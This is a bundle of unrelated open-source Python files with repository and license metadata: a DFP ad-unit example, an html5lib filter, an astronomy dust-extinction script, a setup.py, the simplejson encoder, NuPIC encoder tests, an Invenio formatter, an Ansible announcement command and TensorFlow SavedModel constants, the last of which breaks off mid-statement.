from adspygoogle.common import Utils
def main(client, parent_id):
# Initialize appropriate service.
inventory_service = client.GetService('InventoryService', version='v201302')
# Create ad unit size.
ad_unit_size = {
'size': {
'width': '300',
'height': '250'
},
'environmentType': 'BROWSER'
}
# Create ad unit objects.
web_ad_unit = {
'name': 'Web_ad_unit_%s' % Utils.GetUniqueName(),
'parentId': parent_id,
'description': 'Web ad unit description.',
'targetWindow': 'BLANK',
'targetPlatform': 'WEB',
'adUnitSizes': [ad_unit_size]
}
mobile_ad_unit = {
'name': 'Mobile_ad_unit_%s' % Utils.GetUniqueName(),
'parentId': parent_id,
'description': 'Mobile ad unit description.',
'targetWindow': 'BLANK',
'targetPlatform': 'MOBILE',
'mobilePlatform': 'APPLICATION',
'adUnitSizes': [ad_unit_size]
}
# Add ad units.
ad_units = inventory_service.CreateAdUnits([web_ad_unit, mobile_ad_unit])
# Display results.
for ad_unit in ad_units:
print ('Ad unit with ID \'%s\', name \'%s\', and target platform \'%s\' '
'was created.' % (ad_unit['id'], ad_unit['name'],
ad_unit['targetPlatform']))
if __name__ == '__main__':
# Initialize client object.
dfp_client = DfpClient(path=os.path.join('..', '..', '..', '..', '..'))
# Get the Network Service.
network_service = dfp_client.GetService('NetworkService', version='v201302')
# Set the parent ad unit's ID for all ad units to be created under.
parent_id = network_service.GetCurrentNetwork()[0]['effectiveRootAdUnitId']
main(dfp_client, parent_id)
|
apache-2.0
|
Darkmoth/python-django-4
|
Thing/env/Lib/site-packages/pip/_vendor/html5lib/filters/inject_meta_charset.py
|
1730
|
2746
|
from __future__ import absolute_import, division, unicode_literals
from . import _base
class Filter(_base.Filter):
def __init__(self, source, encoding):
_base.Filter.__init__(self, source)
self.encoding = encoding
def __iter__(self):
state = "pre_head"
meta_found = (self.encoding is None)
pending = []
for token in _base.Filter.__iter__(self):
type = token["type"]
if type == "StartTag":
if token["name"].lower() == "head":
state = "in_head"
elif type == "EmptyTag":
if token["name"].lower() == "meta":
# replace charset with actual encoding
has_http_equiv_content_type = False
for (namespace, name), value in token["data"].items():
if namespace is not None:
continue
elif name.lower() == 'charset':
token["data"][(namespace, name)] = self.encoding
meta_found = True
break
elif name == 'http-equiv' and value.lower() == 'content-type':
has_http_equiv_content_type = True
else:
if has_http_equiv_content_type and (None, "content") in token["data"]:
token["data"][(None, "content")] = 'text/html; charset=%s' % self.encoding
meta_found = True
elif token["name"].lower() == "head" and not meta_found:
# insert meta into empty head
yield {"type": "StartTag", "name": "head",
"data": token["data"]}
yield {"type": "EmptyTag", "name": "meta",
"data": {(None, "charset"): self.encoding}}
yield {"type": "EndTag", "name": "head"}
meta_found = True
continue
elif type == "EndTag":
if token["name"].lower() == "head" and pending:
# insert meta into head (if necessary) and flush pending queue
yield pending.pop(0)
if not meta_found:
yield {"type": "EmptyTag", "name": "meta",
"data": {(None, "charset"): self.encoding}}
while pending:
yield pending.pop(0)
meta_found = True
state = "post_head"
if state == "in_head":
pending.append(token)
else:
yield token
|
gpl-2.0
|
deapplegate/wtgpipeline
|
cal_extinctions.py
|
1
|
2531
|
def calc_EBV(coord_in_ra,coord_in_dec):
#coord_in_ra='12:51:26.28'
#coord_in_dec='27:07:42.'
coord = Equatorial( str(coord_in_ra*(24./360.)), str(coord_in_dec), epoch='2000') # input needs to be in HOURS as a STRING
g = Galactic(coord, epoch='2000') # output is in degrees not hours--it's latitude/longitude
spt = re.split('\:',str(g.lat))
#print spt, abs(float(spt[0])), float(spt[1])/60.
gallat = float(spt[0]) / abs(float(spt[0])) * (abs(float(spt[0])) + float(spt[1])/60. + float(spt[2])/3600. )
#print gallat
#print g.long
spt = re.split('\:',str(g.long))
#print spt
gallong = float(spt[0]) / abs(float(spt[0])) * (abs(float(spt[0])) + float(spt[1])/60. + float(spt[2])/3600. )
#print gallong
#coordtest = Equatorial(Galactic(g.long,g.lat, epoch='2000'), epoch='2000')
output = commands.getoutput('dust_getval ' + str(gallong) + ' ' + str(gallat) + ' interp=y ipath=/nfs/slac/g/ki/ki03/xoc/pkelly/DUST/maps')
spt = re.split('\s',output)
#print spt
EBV = spt[-1]
#print EBV, float(coord_in_ra), float(coord_in_dec)
return EBV
#add E(B-V) to ldac table
import re, commands, sys, bashreader, os
from ephem import *
ppid = os.getppid()
dict = bashreader.parseFile('progs.ini')
table = sys.argv[1]
import time
tempfile = '/tmp/outkey'
ebvfile = '/tmp/outebv'
os.system('rm ' + ebvfile)
command = "ldactoasc -b -i " + table + " -t OBJECTS -k ALPHA_J2000 DELTA_J2000 > " + ebvfile
print command
os.system(command)
print 'done'
tempmap = '/tmp/map' + str(ppid)
os.system('dust_getval ' + str(gallong) + ' ' + str(gallat) + ' interp=y ipath=/nfs/slac/g/ki/ki03/xoc/pkelly/DUST/maps infile=' + ebvfile + ' outfile=' + tempmap + ' noloop=y')
raw_input()
list = []
import re
outkey=open(tempfile,'w')
lines = open(ebvfile,'r').readlines()
# READ IN COLUMN INFO
lineindex = 0
timehold = time.time()
for line in lines:
tt = re.split('\s+',line)
ra = float(tt[0])
dec = float(tt[1])
EBV = calc_EBV(float(ra),float(dec))
outkey.write(str(EBV) + '\n')
lineindex += 1
if lineindex % 1000 == 0:
print lineindex, len(lines), time.time() - timehold
timehold = time.time()
outkey.close()
command = "asctoldac -i " + tempfile + " -o " + tempfile + ".cat -c " + dict['photconf'] + "/EBV.conf -t OBJECTS "
os.system(command)
command = "ldacjoinkey -o test -i " + table + " -p " + tempfile + ".cat -t OBJECTS -k EBV"
os.system(command)
|
mit
|
chintal/cocomo
|
setup.py
|
1
|
1153
|
#!/usr/bin/env python
import os
from setuptools import setup
# Utility function to read the README file.
# Used for the long_description. It's nice, because now 1) we have a top level
# README file and 2) it's easier to type in the README file than to put a raw
# string in below ...
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name="cocomo",
version="0.3",
author="Chintalagiri Shashank",
author_email="[email protected]",
description="Simple wrapper around SLOCCount",
license="MIT",
keywords="utilities",
url="https://github.com/chintal/cocomo",
packages=['cocomo'],
long_description=read('README.rst'),
classifiers=[
"Development Status :: 5 - Production/Stable",
"Topic :: Software Development",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python",
"Intended Audience :: Developers",
"Natural Language :: English",
"Operating System :: OS Independent",
],
platforms='any',
entry_points={
'console_scripts': ['cocomo=cocomo.cocomo:main'],
}
)
|
mit
|
renatogames2/namebench
|
nb_third_party/simplejson/encoder.py
|
296
|
18214
|
"""Implementation of JSONEncoder
"""
import re
from decimal import Decimal
def _import_speedups():
try:
from simplejson import _speedups
return _speedups.encode_basestring_ascii, _speedups.make_encoder
except ImportError:
return None, None
c_encode_basestring_ascii, c_make_encoder = _import_speedups()
from simplejson.decoder import PosInf
ESCAPE = re.compile(r'[\x00-\x1f\\"\b\f\n\r\t]')
ESCAPE_ASCII = re.compile(r'([\\"]|[^\ -~])')
HAS_UTF8 = re.compile(r'[\x80-\xff]')
ESCAPE_DCT = {
'\\': '\\\\',
'"': '\\"',
'\b': '\\b',
'\f': '\\f',
'\n': '\\n',
'\r': '\\r',
'\t': '\\t',
}
for i in range(0x20):
#ESCAPE_DCT.setdefault(chr(i), '\\u{0:04x}'.format(i))
ESCAPE_DCT.setdefault(chr(i), '\\u%04x' % (i,))
FLOAT_REPR = repr
def encode_basestring(s):
"""Return a JSON representation of a Python string
"""
if isinstance(s, str) and HAS_UTF8.search(s) is not None:
s = s.decode('utf-8')
def replace(match):
return ESCAPE_DCT[match.group(0)]
return u'"' + ESCAPE.sub(replace, s) + u'"'
def py_encode_basestring_ascii(s):
"""Return an ASCII-only JSON representation of a Python string
"""
if isinstance(s, str) and HAS_UTF8.search(s) is not None:
s = s.decode('utf-8')
def replace(match):
s = match.group(0)
try:
return ESCAPE_DCT[s]
except KeyError:
n = ord(s)
if n < 0x10000:
#return '\\u{0:04x}'.format(n)
return '\\u%04x' % (n,)
else:
# surrogate pair
n -= 0x10000
s1 = 0xd800 | ((n >> 10) & 0x3ff)
s2 = 0xdc00 | (n & 0x3ff)
#return '\\u{0:04x}\\u{1:04x}'.format(s1, s2)
return '\\u%04x\\u%04x' % (s1, s2)
return '"' + str(ESCAPE_ASCII.sub(replace, s)) + '"'
encode_basestring_ascii = (
c_encode_basestring_ascii or py_encode_basestring_ascii)
class JSONEncoder(object):
"""Extensible JSON <http://json.org> encoder for Python data structures.
Supports the following objects and types by default:
+-------------------+---------------+
| Python | JSON |
+===================+===============+
| dict | object |
+-------------------+---------------+
| list, tuple | array |
+-------------------+---------------+
| str, unicode | string |
+-------------------+---------------+
| int, long, float | number |
+-------------------+---------------+
| True | true |
+-------------------+---------------+
| False | false |
+-------------------+---------------+
| None | null |
+-------------------+---------------+
To extend this to recognize other objects, subclass and implement a
``.default()`` method with another method that returns a serializable
object for ``o`` if possible, otherwise it should call the superclass
implementation (to raise ``TypeError``).
"""
item_separator = ', '
key_separator = ': '
def __init__(self, skipkeys=False, ensure_ascii=True,
check_circular=True, allow_nan=True, sort_keys=False,
indent=None, separators=None, encoding='utf-8', default=None,
use_decimal=False):
"""Constructor for JSONEncoder, with sensible defaults.
If skipkeys is false, then it is a TypeError to attempt
encoding of keys that are not str, int, long, float or None. If
skipkeys is True, such items are simply skipped.
If ensure_ascii is true, the output is guaranteed to be str
objects with all incoming unicode characters escaped. If
ensure_ascii is false, the output will be unicode object.
If check_circular is true, then lists, dicts, and custom encoded
objects will be checked for circular references during encoding to
prevent an infinite recursion (which would cause an OverflowError).
Otherwise, no such check takes place.
If allow_nan is true, then NaN, Infinity, and -Infinity will be
encoded as such. This behavior is not JSON specification compliant,
but is consistent with most JavaScript based encoders and decoders.
Otherwise, it will be a ValueError to encode such floats.
If sort_keys is true, then the output of dictionaries will be
sorted by key; this is useful for regression tests to ensure
that JSON serializations can be compared on a day-to-day basis.
If indent is a string, then JSON array elements and object members
will be pretty-printed with a newline followed by that string repeated
for each level of nesting. ``None`` (the default) selects the most compact
representation without any newlines. For backwards compatibility with
versions of simplejson earlier than 2.1.0, an integer is also accepted
and is converted to a string with that many spaces.
If specified, separators should be a (item_separator, key_separator)
tuple. The default is (', ', ': '). To get the most compact JSON
representation you should specify (',', ':') to eliminate whitespace.
If specified, default is a function that gets called for objects
that can't otherwise be serialized. It should return a JSON encodable
version of the object or raise a ``TypeError``.
If encoding is not None, then all input strings will be
transformed into unicode using that encoding prior to JSON-encoding.
The default is UTF-8.
If use_decimal is true (not the default), ``decimal.Decimal`` will
be supported directly by the encoder. For the inverse, decode JSON
with ``parse_float=decimal.Decimal``.
"""
self.skipkeys = skipkeys
self.ensure_ascii = ensure_ascii
self.check_circular = check_circular
self.allow_nan = allow_nan
self.sort_keys = sort_keys
self.use_decimal = use_decimal
if isinstance(indent, (int, long)):
indent = ' ' * indent
self.indent = indent
if separators is not None:
self.item_separator, self.key_separator = separators
if default is not None:
self.default = default
self.encoding = encoding
def default(self, o):
"""Implement this method in a subclass such that it returns
a serializable object for ``o``, or calls the base implementation
(to raise a ``TypeError``).
For example, to support arbitrary iterators, you could
implement default like this::
def default(self, o):
try:
iterable = iter(o)
except TypeError:
pass
else:
return list(iterable)
return JSONEncoder.default(self, o)
"""
raise TypeError(repr(o) + " is not JSON serializable")
def encode(self, o):
"""Return a JSON string representation of a Python data structure.
>>> from simplejson import JSONEncoder
>>> JSONEncoder().encode({"foo": ["bar", "baz"]})
'{"foo": ["bar", "baz"]}'
"""
# This is for extremely simple cases and benchmarks.
if isinstance(o, basestring):
if isinstance(o, str):
_encoding = self.encoding
if (_encoding is not None
and not (_encoding == 'utf-8')):
o = o.decode(_encoding)
if self.ensure_ascii:
return encode_basestring_ascii(o)
else:
return encode_basestring(o)
# This doesn't pass the iterator directly to ''.join() because the
# exceptions aren't as detailed. The list call should be roughly
# equivalent to the PySequence_Fast that ''.join() would do.
chunks = self.iterencode(o, _one_shot=True)
if not isinstance(chunks, (list, tuple)):
chunks = list(chunks)
if self.ensure_ascii:
return ''.join(chunks)
else:
return u''.join(chunks)
def iterencode(self, o, _one_shot=False):
"""Encode the given object and yield each string
representation as available.
For example::
for chunk in JSONEncoder().iterencode(bigobject):
mysocket.write(chunk)
"""
if self.check_circular:
markers = {}
else:
markers = None
if self.ensure_ascii:
_encoder = encode_basestring_ascii
else:
_encoder = encode_basestring
if self.encoding != 'utf-8':
def _encoder(o, _orig_encoder=_encoder, _encoding=self.encoding):
if isinstance(o, str):
o = o.decode(_encoding)
return _orig_encoder(o)
def floatstr(o, allow_nan=self.allow_nan,
_repr=FLOAT_REPR, _inf=PosInf, _neginf=-PosInf):
# Check for specials. Note that this type of test is processor
# and/or platform-specific, so do tests which don't depend on
# the internals.
if o != o:
text = 'NaN'
elif o == _inf:
text = 'Infinity'
elif o == _neginf:
text = '-Infinity'
else:
return _repr(o)
if not allow_nan:
raise ValueError(
"Out of range float values are not JSON compliant: " +
repr(o))
return text
key_memo = {}
if (_one_shot and c_make_encoder is not None
and not self.indent and not self.sort_keys):
_iterencode = c_make_encoder(
markers, self.default, _encoder, self.indent,
self.key_separator, self.item_separator, self.sort_keys,
self.skipkeys, self.allow_nan, key_memo, self.use_decimal)
else:
_iterencode = _make_iterencode(
markers, self.default, _encoder, self.indent, floatstr,
self.key_separator, self.item_separator, self.sort_keys,
self.skipkeys, _one_shot, self.use_decimal)
try:
return _iterencode(o, 0)
finally:
key_memo.clear()
class JSONEncoderForHTML(JSONEncoder):
"""An encoder that produces JSON safe to embed in HTML.
To embed JSON content in, say, a script tag on a web page, the
characters &, < and > should be escaped. They cannot be escaped
with the usual entities (e.g. &) because they are not expanded
within <script> tags.
"""
def encode(self, o):
# Override JSONEncoder.encode because it has hacks for
# performance that make things more complicated.
chunks = self.iterencode(o, True)
if self.ensure_ascii:
return ''.join(chunks)
else:
return u''.join(chunks)
def iterencode(self, o, _one_shot=False):
chunks = super(JSONEncoderForHTML, self).iterencode(o, _one_shot)
for chunk in chunks:
chunk = chunk.replace('&', '\\u0026')
chunk = chunk.replace('<', '\\u003c')
chunk = chunk.replace('>', '\\u003e')
yield chunk
def _make_iterencode(markers, _default, _encoder, _indent, _floatstr,
_key_separator, _item_separator, _sort_keys, _skipkeys, _one_shot,
_use_decimal,
## HACK: hand-optimized bytecode; turn globals into locals
False=False,
True=True,
ValueError=ValueError,
basestring=basestring,
Decimal=Decimal,
dict=dict,
float=float,
id=id,
int=int,
isinstance=isinstance,
list=list,
long=long,
str=str,
tuple=tuple,
):
def _iterencode_list(lst, _current_indent_level):
if not lst:
yield '[]'
return
if markers is not None:
markerid = id(lst)
if markerid in markers:
raise ValueError("Circular reference detected")
markers[markerid] = lst
buf = '['
if _indent is not None:
_current_indent_level += 1
newline_indent = '\n' + (_indent * _current_indent_level)
separator = _item_separator + newline_indent
buf += newline_indent
else:
newline_indent = None
separator = _item_separator
first = True
for value in lst:
if first:
first = False
else:
buf = separator
if isinstance(value, basestring):
yield buf + _encoder(value)
elif value is None:
yield buf + 'null'
elif value is True:
yield buf + 'true'
elif value is False:
yield buf + 'false'
elif isinstance(value, (int, long)):
yield buf + str(value)
elif isinstance(value, float):
yield buf + _floatstr(value)
elif _use_decimal and isinstance(value, Decimal):
yield buf + str(value)
else:
yield buf
if isinstance(value, (list, tuple)):
chunks = _iterencode_list(value, _current_indent_level)
elif isinstance(value, dict):
chunks = _iterencode_dict(value, _current_indent_level)
else:
chunks = _iterencode(value, _current_indent_level)
for chunk in chunks:
yield chunk
if newline_indent is not None:
_current_indent_level -= 1
yield '\n' + (_indent * _current_indent_level)
yield ']'
if markers is not None:
del markers[markerid]
def _iterencode_dict(dct, _current_indent_level):
if not dct:
yield '{}'
return
if markers is not None:
markerid = id(dct)
if markerid in markers:
raise ValueError("Circular reference detected")
markers[markerid] = dct
yield '{'
if _indent is not None:
_current_indent_level += 1
newline_indent = '\n' + (_indent * _current_indent_level)
item_separator = _item_separator + newline_indent
yield newline_indent
else:
newline_indent = None
item_separator = _item_separator
first = True
if _sort_keys:
items = dct.items()
items.sort(key=lambda kv: kv[0])
else:
items = dct.iteritems()
for key, value in items:
if isinstance(key, basestring):
pass
# JavaScript is weakly typed for these, so it makes sense to
# also allow them. Many encoders seem to do something like this.
elif isinstance(key, float):
key = _floatstr(key)
elif key is True:
key = 'true'
elif key is False:
key = 'false'
elif key is None:
key = 'null'
elif isinstance(key, (int, long)):
key = str(key)
elif _skipkeys:
continue
else:
raise TypeError("key " + repr(key) + " is not a string")
if first:
first = False
else:
yield item_separator
yield _encoder(key)
yield _key_separator
if isinstance(value, basestring):
yield _encoder(value)
elif value is None:
yield 'null'
elif value is True:
yield 'true'
elif value is False:
yield 'false'
elif isinstance(value, (int, long)):
yield str(value)
elif isinstance(value, float):
yield _floatstr(value)
elif _use_decimal and isinstance(value, Decimal):
yield str(value)
else:
if isinstance(value, (list, tuple)):
chunks = _iterencode_list(value, _current_indent_level)
elif isinstance(value, dict):
chunks = _iterencode_dict(value, _current_indent_level)
else:
chunks = _iterencode(value, _current_indent_level)
for chunk in chunks:
yield chunk
if newline_indent is not None:
_current_indent_level -= 1
yield '\n' + (_indent * _current_indent_level)
yield '}'
if markers is not None:
del markers[markerid]
def _iterencode(o, _current_indent_level):
if isinstance(o, basestring):
yield _encoder(o)
elif o is None:
yield 'null'
elif o is True:
yield 'true'
elif o is False:
yield 'false'
elif isinstance(o, (int, long)):
yield str(o)
elif isinstance(o, float):
yield _floatstr(o)
elif isinstance(o, (list, tuple)):
for chunk in _iterencode_list(o, _current_indent_level):
yield chunk
elif isinstance(o, dict):
for chunk in _iterencode_dict(o, _current_indent_level):
yield chunk
elif _use_decimal and isinstance(o, Decimal):
yield str(o)
else:
if markers is not None:
markerid = id(o)
if markerid in markers:
raise ValueError("Circular reference detected")
markers[markerid] = o
o = _default(o)
for chunk in _iterencode(o, _current_indent_level):
yield chunk
if markers is not None:
del markers[markerid]
return _iterencode
|
apache-2.0
|
chen0031/nupic
|
tests/unit/nupic/encoders/pass_through_encoder_test.py
|
28
|
5099
|
#!/usr/bin/env python
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
"""Unit tests for PassThru Encoder."""
CL_VERBOSITY = 0
import tempfile
import unittest2 as unittest
import numpy
from nupic.encoders.pass_through_encoder import PassThroughEncoder
try:
import capnp
except ImportError:
capnp = None
if capnp:
from nupic.encoders.pass_through_capnp import PassThroughEncoderProto
class PassThroughEncoderTest(unittest.TestCase):
"""Unit tests for PassThroughEncoder class."""
def setUp(self):
self.n = 9
self.name = "foo"
self._encoder = PassThroughEncoder
def testEncodeArray(self):
"""Send bitmap as array"""
e = self._encoder(self.n, name=self.name)
bitmap = [0,0,0,1,0,0,0,0,0]
out = e.encode(bitmap)
self.assertEqual(out.sum(), sum(bitmap))
x = e.decode(out)
self.assertIsInstance(x[0], dict)
self.assertTrue(self.name in x[0])
def testEncodeBitArray(self):
"""Send bitmap as numpy bit array"""
e = self._encoder(self.n, name=self.name)
bitmap = numpy.zeros(self.n, dtype=numpy.uint8)
bitmap[3] = 1
bitmap[5] = 1
out = e.encode(bitmap)
expectedSum = sum(bitmap)
realSum = out.sum()
self.assertEqual(realSum, expectedSum)
def testClosenessScores(self):
"""Compare two bitmaps for closeness"""
e = self._encoder(self.n, name=self.name)
"""Identical => 1"""
bitmap1 = [0,0,0,1,1,1,0,0,0]
bitmap2 = [0,0,0,1,1,1,0,0,0]
out1 = e.encode(bitmap1)
out2 = e.encode(bitmap2)
c = e.closenessScores(out1, out2)
self.assertEqual(c[0], 1.0)
"""No overlap => 0"""
bitmap1 = [0,0,0,1,1,1,0,0,0]
bitmap2 = [1,1,1,0,0,0,1,1,1]
out1 = e.encode(bitmap1)
out2 = e.encode(bitmap2)
c = e.closenessScores(out1, out2)
self.assertEqual(c[0], 0.0)
"""Similar => 4 of 5 match"""
bitmap1 = [1,0,1,0,1,0,1,0,1]
bitmap2 = [1,0,0,1,1,0,1,0,1]
out1 = e.encode(bitmap1)
out2 = e.encode(bitmap2)
c = e.closenessScores(out1, out2)
self.assertEqual(c[0], 0.8)
"""Little => 1 of 5 match"""
bitmap1 = [1,0,0,1,1,0,1,0,1]
bitmap2 = [0,1,1,1,0,1,0,1,0]
out1 = e.encode(bitmap1)
out2 = e.encode(bitmap2)
c = e.closenessScores(out1, out2)
self.assertEqual(c[0], 0.2)
"""Extra active bit => off by 1 of 5"""
bitmap1 = [1,0,1,0,1,0,1,0,1]
bitmap2 = [1,0,1,1,1,0,1,0,1]
out1 = e.encode(bitmap1)
out2 = e.encode(bitmap2)
c = e.closenessScores(out1, out2)
self.assertEqual(c[0], 0.8)
"""Missing active bit => off by 1 of 5"""
bitmap1 = [1,0,1,0,1,0,1,0,1]
bitmap2 = [1,0,0,0,1,0,1,0,1]
out1 = e.encode(bitmap1)
out2 = e.encode(bitmap2)
c = e.closenessScores(out1, out2)
self.assertEqual(c[0], 0.8)
@unittest.skipUnless(
capnp, "pycapnp is not installed, skipping serialization test.")
def testReadWrite(self):
original = self._encoder(self.n, name=self.name)
originalValue = original.encode([1,0,1,0,1,0,1,0,1])
proto1 = PassThroughEncoderProto.new_message()
original.write(proto1)
# Write the proto to a temp file and read it back into a new proto
with tempfile.TemporaryFile() as f:
proto1.write(f)
f.seek(0)
proto2 = PassThroughEncoderProto.read(f)
encoder = PassThroughEncoder.read(proto2)
self.assertIsInstance(encoder, PassThroughEncoder)
self.assertEqual(encoder.name, original.name)
self.assertEqual(encoder.verbosity, original.verbosity)
self.assertEqual(encoder.w, original.w)
self.assertEqual(encoder.n, original.n)
self.assertEqual(encoder.description, original.description)
self.assertTrue(numpy.array_equal(encoder.encode([1,0,1,0,1,0,1,0,1]),
originalValue))
self.assertEqual(original.decode(encoder.encode([1,0,1,0,1,0,1,0,1])),
encoder.decode(original.encode([1,0,1,0,1,0,1,0,1])))
# Feed in a new value and ensure the encodings match
result1 = original.encode([0,1,0,1,0,1,0,1,0])
result2 = encoder.encode([0,1,0,1,0,1,0,1,0])
self.assertTrue(numpy.array_equal(result1, result2))
if __name__ == "__main__":
unittest.main()
|
agpl-3.0
|
egabancho/invenio
|
invenio/modules/formatter/format_elements/bfe_imprint.py
|
36
|
2474
|
# -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""BibFormat element - Prints document imprint
"""
__revision__ = "$Id$"
import time
def format_element(bfo, place_label, publisher_label, date_label,
separator=', ', date_format=""):
"""
Print imprint (Order: Name of publisher, place of publication and date of publication).
Parameter <code>date_format</code> allows to specify the string representation of the output.
The format string has the same behaviour as the strftime() function::
<pre>Eg: 1982-09-24 07:32:00
"%d %B %Y" -> 24 September 1982
"%I:%M" -> 07:32
</pre>
@param separator: a separator between the elements of imprint
@param place_label: a label to print before the publication place value
@param publisher_label: a label to print before the publisher name
@param date_label: a a label to print before the publication date
@param date_format: date format
@see: place.py, publisher.py, date.py, reprints.py, pagination.py
"""
place = bfo.field('260__a')
publisher = bfo.field('260__b')
date = bfo.field('260__c')
out = ""
if publisher != "sine nomine":
out += publisher_label + ' ' + publisher + separator
if place != "sine loco":
out += place_label + ' ' + place + separator
if len(date) > 0:
if date_format != '':
try:
date_time = time.strptime(date, "%Y-%m-%d")
out += date_label + " " + time.strftime(date_format, date_time)
except ValueError:
out += date_label + ' ' + date
else:
out += date_label + ' ' + date
return out
|
gpl-2.0
|
s-hertel/ansible
|
hacking/build_library/build_ansible/command_plugins/release_announcement.py
|
55
|
2905
|
# coding: utf-8
# Copyright: (c) 2019, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import sys
from collections import UserString
from distutils.version import LooseVersion
# Pylint doesn't understand Python3 namespace modules.
from ..commands import Command # pylint: disable=relative-beyond-top-level
from .. import errors # pylint: disable=relative-beyond-top-level
class VersionStr(UserString):
def __init__(self, string):
super().__init__(string.strip())
self.ver_obj = LooseVersion(string)
def transform_args(args):
# Make it possible to sort versions in the jinja2 templates
new_versions = []
for version in args.versions:
new_versions.append(VersionStr(version))
args.versions = new_versions
return args
def write_message(filename, message):
if filename != '-':
with open(filename, 'w') as out_file:
out_file.write(message)
else:
sys.stdout.write('\n\n')
sys.stdout.write(message)
class ReleaseAnnouncementCommand(Command):
name = 'release-announcement'
@classmethod
def init_parser(cls, add_parser):
parser = add_parser(cls.name,
description="Generate email and twitter announcements from template")
parser.add_argument("--version", dest="versions", type=str, required=True, action='append',
help="Versions of Ansible to announce")
parser.add_argument("--name", type=str, required=True, help="Real name to use on emails")
parser.add_argument("--email-out", type=str, default="-",
help="Filename to place the email announcement into")
parser.add_argument("--twitter-out", type=str, default="-",
help="Filename to place the twitter announcement into")
@classmethod
def main(cls, args):
if sys.version_info < (3, 6):
raise errors.DependencyError('The {0} subcommand needs Python-3.6+'
' to run'.format(cls.name))
# Import here because these functions are invalid on Python-3.5 and the command plugins and
# init_parser() method need to be compatible with Python-3.4+ for now.
# Pylint doesn't understand Python3 namespace modules.
from .. announce import create_short_message, create_long_message # pylint: disable=relative-beyond-top-level
args = transform_args(args)
twitter_message = create_short_message(args.versions)
email_message = create_long_message(args.versions, args.name)
write_message(args.twitter_out, twitter_message)
write_message(args.email_out, email_message)
return 0
|
gpl-3.0
|
asimshankar/tensorflow
|
tensorflow/python/saved_model/constants.py
|
13
|
4118
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Constants for SavedModel save and restore operations.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.util.tf_export import tf_export
# Subdirectory name containing the asset files.
ASSETS_DIRECTORY = "assets"
tf_export(
"saved_model.ASSETS_DIRECTORY",
v1=[
"saved_model.ASSETS_DIRECTORY", "saved_model.constants.ASSETS_DIRECTORY"
]).export_constant(__name__, "ASSETS_DIRECTORY")
# Subdirectory name containing unmanaged files from higher-level APIs.
EXTRA_ASSETS_DIRECTORY = "assets.extra"
# CollectionDef key containing SavedModel assets.
ASSETS_KEY = "saved_model_assets"
tf_export(
"saved_model.ASSETS_KEY",
v1=["saved_model.ASSETS_KEY",
"saved_model.constants.ASSETS_KEY"]).export_constant(
__name__, "ASSETS_KEY")
# CollectionDef key for the legacy init op.
LEGACY_INIT_OP_KEY = "legacy_init_op"
tf_export(
v1=[
"saved_model.LEGACY_INIT_OP_KEY",
"saved_model.constants.LEGACY_INIT_OP_KEY"
]).export_constant(__name__, "LEGACY_INIT_OP_KEY")
# CollectionDef key for the SavedModel main op.
MAIN_OP_KEY = "saved_model_main_op"
tf_export(
v1=["saved_model.MAIN_OP_KEY",
"saved_model.constants.MAIN_OP_KEY"]).export_constant(
__name__, "MAIN_OP_KEY")
# CollectionDef key for the SavedModel train op.
# Not exported while export_all_saved_models is experimental.
TRAIN_OP_KEY = "saved_model_train_op"
# Schema version for SavedModel.
SAVED_MODEL_SCHEMA_VERSION = 1
tf_export(
"saved_model.SAVED_MODEL_SCHEMA_VERSION",
v1=[
"saved_model.SAVED_MODEL_SCHEMA_VERSION",
"saved_model.constants.SAVED_MODEL_SCHEMA_VERSION"
]).export_constant(__name__, "SAVED_MODEL_SCHEMA_VERSION")
# File name for SavedModel protocol buffer.
SAVED_MODEL_FILENAME_PB = "saved_model.pb"
tf_export(
"saved_model.SAVED_MODEL_FILENAME_PB",
v1=[
"saved_model.SAVED_MODEL_FILENAME_PB",
"saved_model.constants.SAVED_MODEL_FILENAME_PB"
]).export_constant(__name__, "SAVED_MODEL_FILENAME_PB")
# File name for text version of SavedModel protocol buffer.
SAVED_MODEL_FILENAME_PBTXT = "saved_model.pbtxt"
tf_export(
"saved_model.SAVED_MODEL_FILENAME_PBTXT",
v1=[
"saved_model.SAVED_MODEL_FILENAME_PBTXT",
"saved_model.constants.SAVED_MODEL_FILENAME_PBTXT"
]).export_constant(__name__, "SAVED_MODEL_FILENAME_PBTXT")
# File name for json format of SavedModel.
# Not exported while keras_saved_model is in contrib.
SAVED_MODEL_FILENAME_JSON = "saved_model.json"
# Subdirectory name containing the variables/checkpoint files.
VARIABLES_DIRECTORY = "variables"
tf_export(
